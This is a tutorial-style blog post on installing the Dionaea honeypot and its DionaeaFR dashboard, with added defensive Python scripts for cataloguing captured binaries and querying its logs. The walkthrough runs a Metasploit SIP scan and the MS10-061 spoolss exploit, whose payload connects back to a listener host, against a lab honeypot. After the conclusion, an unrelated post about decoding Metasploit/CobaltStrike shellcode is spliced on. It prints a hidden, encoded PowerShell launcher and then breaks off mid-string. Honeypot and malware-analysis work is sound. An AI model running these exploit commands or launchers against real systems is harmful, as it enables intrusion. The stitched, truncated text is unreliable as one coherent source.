Dionaea – A Malware collection honeypot

Introduction 

This post outlines the requirements, configuration and step-by-step installation procedure for the Dionaea honeypot. It also briefly covers how Dionaea logs attacks from external entities and how the results are presented in a dashboard interface for ease of understanding.

Dionaea


Dionaea is a modern malware-collection honeypot designed to trap malware that exploits vulnerabilities exposed by network services, in order to obtain a copy of the malware. Dionaea emulates protocols by embedding Python as its scripting language and detects shellcode using libemu. It also supports IPv6 and TLS. Dionaea traps malware arriving over the following protocols:
SMB (Server Message Block)
HTTP (Hyper Text Transfer Protocol)
FTP (File Transfer Protocol)
TFTP (Trivial File Transfer Protocol)
MSSQL (Microsoft SQL Server)
VoIP (Voice over IP)

Requirements 

Ubuntu 12.04 LTS Server 

Configuration 

·      sudo apt-get install libudns-dev libglib2.0-dev libssl-dev libcurl4-openssl-dev libreadline-dev libsqlite3-dev python-dev libtool automake autoconf build-essential subversion git-core flex bison pkg-config libgc-dev libgc1c2 sqlite3 python-geoip sqlite python-pip
·      Create /opt/dionaea/ directory
mkdir /opt/dionaea/
·      Create temp directory  for installation
mkdir ~/src
·       Install Liblcfg Package
cd ~/src
git clone git://git.carnivore.it/liblcfg.git liblcfg
cd liblcfg/code
autoreconf -vi
./configure --prefix=/opt/dionaea
make install
·       Install Libemu package
cd ~/src
git clone git://git.carnivore.it/libemu.git libemu
cd libemu
autoreconf -vi
./configure --prefix=/opt/dionaea
make
make install
ldconfig
·       Install Libnl
On Ubuntu:
apt-get install libnl-3-dev libnl-genl-3-dev libnl-nf-3-dev libnl-route-3-dev
Otherwise, install it from git:
cd ~/src
git clone git://git.infradead.org/users/tgr/libnl.git
cd libnl
autoreconf -vi
export LDFLAGS=-Wl,-rpath,/opt/dionaea/lib
./configure --prefix=/opt/dionaea
make
make install
ldconfig
·       Install Libev
cd ~/src
tar -xvzf libev-4.04.tar.gz
cd libev-4.04
./configure --prefix=/opt/dionaea
make
make install
·       Install Python 3.2
cd ~/src
tar xfz Python-3.2.2.tgz
cd Python-3.2.2
./configure --enable-shared --prefix=/opt/dionaea --with-computed-gotos --enable-ipv6 LDFLAGS="-Wl,-rpath=/opt/dionaea/lib/ -L/usr/lib/x86_64-linux-gnu/"
make
make install
ldconfig
·       Install Cython 
cd ~/src
tar xfz Cython-0.21rc1.tar.gz
cd Cython-0.21rc1
/opt/dionaea/bin/python3 setup.py install
ldconfig
·       Install Libcurl
sudo apt-get install curl libc6 libcurl3 zlib1g
·       Install Libpcap
tar xfz libpcap-1.6.2.tar.gz
cd libpcap-1.6.2
./configure --prefix=/opt/dionaea
make
make install
ldconfig
·       Install p0f
apt-get install p0f -y
cd /
mkdir nonexistent
chown -R nobody:nogroup nonexistent
·       Clone Dionaea from github
cd ~/src
git clone git://git.carnivore.it/dionaea.git dionaea
·       Compile Dionaea
cd ~/src/dionaea
autoreconf -vi
./configure --with-lcfg-include=/opt/dionaea/include/ \
     --with-lcfg-lib=/opt/dionaea/lib/ \
     --with-python=/opt/dionaea/bin/python3.2 \
     --with-cython-dir=/opt/dionaea/bin \
     --with-udns-include=/opt/dionaea/include/ \
     --with-udns-lib=/opt/dionaea/lib/ \
     --with-emu-include=/opt/dionaea/include/ \
     --with-emu-lib=/opt/dionaea/lib/ \
     --with-gc-include=/usr/include/gc \
     --with-ev-include=/opt/dionaea/include \
     --with-ev-lib=/opt/dionaea/lib \
     --with-nl-include=/opt/dionaea/include \
     --with-nl-lib=/opt/dionaea/lib/ \
     --with-curl-config=/usr/bin/ \
     --with-pcap-include=/opt/dionaea/include \
     --with-pcap-lib=/opt/dionaea/lib/
make
make install
·       Test Dionaea installation
/opt/dionaea/bin/dionaea --help
/opt/dionaea/bin/dionaea -r /opt/dionaea

DionaeaFR – Dashboard 

·      Install pip (Python package manager) and python-netaddr package
apt-get install python-pip python-netaddr
·    Install prerequisites using pip
pip install Django
pip install pygeoip
pip install django-pagination
pip install django-tables2
pip install django-compressor
pip install django-htmlmin
·    Install django-tables2-simplefilter
cd /opt/
unzip django-tables2-simplefilter.zip
mv django-tables2-simplefilter-master/ django-tables2-simplefilter/
cd django-tables2-simplefilter/
python setup.py install
·    Install PySubnetTree
cd /opt/
cd pysubnettree/
python setup.py install
·    Compile and install Node.js from sources
cd /opt/
tar xzvf node-v0.8.16.tar.gz
cd node-v0.8.16
./configure
make
make install
·    Install LESS using npm
npm install -g less
·    Download DionaeaFR
unzip DionaeaFR.zip
mv DionaeaFR-master/ DionaeaFR
·    Get Maxmind’s GeoIP and GeoLite databases
cd /opt/
gunzip GeoLiteCity.dat.gz
gunzip GeoIP.dat.gz
mv GeoIP.dat DionaeaFR/DionaeaFR/static
mv GeoLiteCity.dat DionaeaFR/DionaeaFR/static
·    If the Dionaea installation does not follow the official Dionaea installation guide, line 17 of /opt/DionaeaFR/DionaeaFR/settings.py should be set to the path of Dionaea's SQLite database.
·    Change the STATIC_ROOT variable in settings.py to DionaeaFR's folder/static/
·    To start DionaeaFR
cd /opt/DionaeaFR/
sudo python manage.py collectstatic  #type yes when asked
sudo python manage.py runserver 0.0.0.0:8080
·    DionaeaFR's interface can also be accessed remotely

Logging 

Run Dionaea to start logging. Here Dionaea runs on IP 192.168.0.109; check which sockets it is listening on with netstat (the -t option lists TCP listeners only, so add -u to also see UDP services such as SIP on port 5060):
·      /opt/dionaea/bin/dionaea -r /opt/dionaea

·      netstat -ntlp | grep 192.168.0.109




An nmap scan of 192.168.0.109 shows the ports above as open, and the emulated services can be probed for the vulnerabilities associated with them. For example, to do more reconnaissance on SIP it can be scanned with various Metasploit auxiliary modules. Meanwhile Dionaea picks up the traffic while the Metasploit auxiliary scan is running. The scanning traffic is logged as shown in the figure below.


The auxiliary SIP OPTIONS scan on port 5060:
msfcli auxiliary/scanner/sip/options CHOST=192.168.0.169 CPORT=5066 RHOST=192.168.0.109 RPORT=5060 E

Looking into the Dionaea log file at /opt/dionaea/var/log/dionaea.log, we can investigate the connection traffic and find possible attack indicators. But querying Dionaea's LogSQL SQLite database with the Python script readlogsqltree gives more readable output: for each incident it reports the exploited vulnerability, the time, the attacker and information about any shellcode.
python3.2 /opt/dionaea/bin/readlogsqltree /opt/dionaea/var/dionaea/logsql.sqlite




Now let's exploit the MS10-061 vulnerability in the Print Spooler service, which could allow remote code execution. Since Dionaea emulates the SMB service to trap malware, we run the Windows Print Spooler remote code execution exploit against the honeypot:

msfcli exploit/windows/smb/ms10_061_spoolss PNAME=XPSPrinter RHOST=192.168.0.109 EXITFUNC=process LHOST=192.168.0.169 LPORT=4444 E

Dionaea detects and picks up the incidents as shown in the figure below.


Let's check the /opt/dionaea/var/dionaea/binaries directory to see whether Dionaea captured any binary executable. Here we go:
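Dionaea drops every captured payload into that binaries directory. The script below is an added example, not part of the original post and not Dionaea's own code: it catalogues the directory without executing anything in it, recomputes MD5 and SHA-256 for each file, and flags files whose name no longer matches their content. It assumes, as Dionaea does, that each captured file is stored under its MD5 hex digest; the helper make_sample_dir() and the constructed files it writes exist only so the script runs offline.

```python
# Added example, not part of the original post or of Dionaea: catalogue the files
# Dionaea dropped into var/dionaea/binaries without executing any of them.
# ASSUMPTION: Dionaea names each captured file after its MD5 hex digest, so a file
# whose name does not match its recomputed MD5 was renamed, truncated or tampered
# with; the script recomputes MD5 and SHA-256 and flags such files.
import hashlib
import os
import sys
import tempfile

PE_MAGIC = b"MZ"  # DOS/PE header signature; a quick, non-executing type hint


def hash_file(path):
    """Return (md5, sha256) hex digests, streaming so large samples fit in memory."""
    md5, sha256 = hashlib.md5(), hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            md5.update(chunk)
            sha256.update(chunk)
    return md5.hexdigest(), sha256.hexdigest()


def catalogue(binaries_dir):
    """One record per regular file in binaries_dir, sorted by file name."""
    records = []
    for name in sorted(os.listdir(binaries_dir)):
        path = os.path.join(binaries_dir, name)
        if not os.path.isfile(path):
            continue
        md5, sha256 = hash_file(path)
        with open(path, "rb") as f:
            magic = f.read(len(PE_MAGIC))
        records.append({
            "name": name,
            "size": os.path.getsize(path),
            "md5": md5,
            "sha256": sha256,
            "name_matches_md5": name.lower() == md5,
            "looks_like_pe": magic == PE_MAGIC,
        })
    return records


def suspicious(records):
    """Names of files whose content no longer matches the MD5 they were stored under."""
    return [r["name"] for r in records if not r["name_matches_md5"]]


def make_sample_dir():
    """Throwaway directory with two constructed, harmless files for offline runs."""
    d = tempfile.mkdtemp(prefix="dionaea-binaries-")
    fake_pe = PE_MAGIC + b"\x00" * 62 + b"constructed stand-in, not a real executable"
    with open(os.path.join(d, hashlib.md5(fake_pe).hexdigest()), "wb") as f:
        f.write(fake_pe)
    # stored under a name that is not its MD5, as a renamed or tampered file would be
    with open(os.path.join(d, "0" * 32), "wb") as f:
        f.write(b"plain text whose hash does not match the file name")
    return d


if __name__ == "__main__":
    # usage: python3 catalogue_binaries.py [/opt/dionaea/var/dionaea/binaries]
    target = sys.argv[1] if len(sys.argv) > 1 else make_sample_dir()
    for r in catalogue(target):
        flag = "OK " if r["name_matches_md5"] else "BAD"
        kind = "PE " if r["looks_like_pe"] else "?  "
        print("%s %s %8d %s %s" % (flag, kind, r["size"], r["sha256"], r["name"]))
```

Run it against the real directory with the path as the first argument; the SHA-256 column is what you would submit to a sandbox or match against threat-intelligence feeds, and any BAD line means the stored sample is not what Dionaea originally wrote.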


Meanwhile, querying Dionaea's LogSQL SQLite database gives a better understanding of the traffic generated by the attack:
python3.2 /opt/dionaea/bin/readlogsqltree /opt/dionaea/var/dionaea/logsql.sqlite
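readlogsqltree prints the whole incident tree, which is useful for a single attack but hard to skim once the honeypot has been online for a while. The script below is an added example, not part of the original post and not Dionaea's readlogsqltree, showing how to ask the same logsql.sqlite database (the one queried by both readlogsqltree calls above) the questions a defender usually wants answered first: hits per emulated service, the busiest source addresses, and which connection delivered each captured binary. It assumes the connections and downloads table layout of Dionaea's logsql module (table and column names are an assumption to verify with .schema in the sqlite3 shell), and it uses the system Python 3 rather than the 3.2 build under /opt/dionaea. The sample rows are constructed and mirror the SIP scan and MS10-061 attempt from the walkthrough.

```python
# Added example, not part of the original post and not Dionaea's own readlogsqltree:
# summarise a Dionaea logsql.sqlite database with Python's standard sqlite3 module.
# ASSUMPTION: the table and column names (connections, downloads, connection_type,
# connection_protocol, remote_host, download_md5_hash, ...) follow Dionaea's logsql
# schema; check them against your own database with `.schema` in the sqlite3 shell.
import sqlite3
import sys

SCHEMA = """
CREATE TABLE connections (
    connection INTEGER PRIMARY KEY, connection_type TEXT, connection_transport TEXT,
    connection_protocol TEXT, connection_timestamp INTEGER, connection_root INTEGER,
    connection_parent INTEGER, local_host TEXT, local_port INTEGER,
    remote_host TEXT, remote_hostname TEXT, remote_port INTEGER);
CREATE TABLE downloads (
    download INTEGER PRIMARY KEY, connection INTEGER, download_url TEXT, download_md5_hash TEXT);
"""

# Constructed sample rows modelled on the walkthrough: a SIP OPTIONS scan and an
# MS10-061 attempt from 192.168.0.169 against the honeypot at 192.168.0.109, plus
# one unrelated HTTP hit. The MD5 is a placeholder (hash of the empty string).
SAMPLE_CONNECTIONS = [
    # type,   transport, protocol,   timestamp,  local_host,     lport, remote_host,    rport
    ("accept", "udp", "SipSession", 1410000001, "192.168.0.109", 5060, "192.168.0.169", 5066),
    ("accept", "udp", "SipSession", 1410000002, "192.168.0.109", 5060, "192.168.0.169", 5066),
    ("accept", "tcp", "smbd",       1410000100, "192.168.0.109", 445,  "192.168.0.169", 49152),
    ("accept", "tcp", "httpd",      1410000200, "192.168.0.109", 80,   "198.51.100.23", 51000),
]
SAMPLE_DOWNLOADS = [
    # connection id (the smbd session above), URL offered by the attacker, MD5 placeholder
    (3, "http://192.168.0.169:8080/payload.exe", "d41d8cd98f00b204e9800998ecf8427e"),
]


def build_sample_db():
    """In-memory database filled with the constructed rows, for offline runs."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.executemany(
        "INSERT INTO connections (connection_type, connection_transport, connection_protocol,"
        " connection_timestamp, local_host, local_port, remote_host, remote_port)"
        " VALUES (?, ?, ?, ?, ?, ?, ?, ?)",
        SAMPLE_CONNECTIONS,
    )
    db.executemany(
        "INSERT INTO downloads (connection, download_url, download_md5_hash) VALUES (?, ?, ?)",
        SAMPLE_DOWNLOADS,
    )
    db.commit()
    return db


def open_db(path):
    """Open a real logsql.sqlite read-only so the honeypot's own writer is never disturbed."""
    return sqlite3.connect("file:%s?mode=ro" % path, uri=True)


def connections_by_protocol(db):
    """Accepted inbound connections per emulated service, e.g. {'smbd': 1, ...}."""
    rows = db.execute(
        "SELECT connection_protocol, COUNT(*) FROM connections"
        " WHERE connection_type = 'accept' GROUP BY connection_protocol"
    ).fetchall()
    return dict(rows)


def top_remote_hosts(db, limit=5):
    """Busiest source addresses as (remote_host, count) tuples, most active first."""
    return db.execute(
        "SELECT remote_host, COUNT(*) AS n FROM connections"
        " WHERE connection_type = 'accept'"
        " GROUP BY remote_host ORDER BY n DESC, remote_host LIMIT ?",
        (limit,),
    ).fetchall()


def downloads_with_origin(db):
    """Each captured binary joined to the connection that delivered it."""
    return db.execute(
        "SELECT d.download_md5_hash, d.download_url, c.remote_host, c.connection_protocol"
        " FROM downloads d JOIN connections c ON c.connection = d.connection"
        " ORDER BY d.download"
    ).fetchall()


def report(db):
    print("connections per protocol:")
    for proto, n in sorted(connections_by_protocol(db).items()):
        print("  %-12s %d" % (proto, n))
    print("top remote hosts:")
    for host, n in top_remote_hosts(db):
        print("  %-16s %d" % (host, n))
    print("captured downloads (md5, url, source, via):")
    for row in downloads_with_origin(db):
        print("  " + "  ".join(str(x) for x in row))


if __name__ == "__main__":
    # usage: python3 summarise_logsql.py [/opt/dionaea/var/dionaea/logsql.sqlite]
    report(open_db(sys.argv[1]) if len(sys.argv) > 1 else build_sample_db())
```

Opening the database read-only matters on a live honeypot: Dionaea writes to logsql.sqlite continuously, and a second writer holding the lock would make it drop or delay log entries. The join in downloads_with_origin is the query to extend when you want to tie a captured MD5 back to the attacking host, the emulated service and, via connection_timestamp, the time window for a packet capture.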



Dashboard


DionaeaFR is a front-end dashboard that visualises the results of the Dionaea honeypot. It shows connections, downloaded malware and the attackers' geolocations, and can filter the results by state, protocol, service, port and remote port. It runs on the local machine and is also accessible remotely. To run DionaeaFR:
•  cd /opt/DionaeaFR
   sudo python manage.py collectstatic #type yes when asked
   sudo python manage.py runserver 0.0.0.0:8080


Using the filters, the SIP sessions can be seen in the figure below.


The downloaded malware can be seen in the dashboard interface.

Conclusion 

The collected malware can be analysed further to better understand the attacks. The geolocations of the attackers can be seen in the dashboard's map interface. The dashboard can also be accessed remotely for interactive monitoring.

Introduction This post is about how to decode one type of shellcode generated by Metasploit framework and CobaltStrike to get the C2 domain/IP address so that the incident responder can able to identify and block the further adversary activity. FYI this post doesn't cover the initial infection vector (like phishing thorough office maldoc) or how the shellcode will get generated (like from Metasploit framework or Cobaltstrike ). It leverages CyberChef to fully decode and get the shellcode from an encoded powershell command and further it will be fed into scdbg  emulator to get the IP address of C2 or an adversary ShellCode Here we have the encoded powershell command  powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAH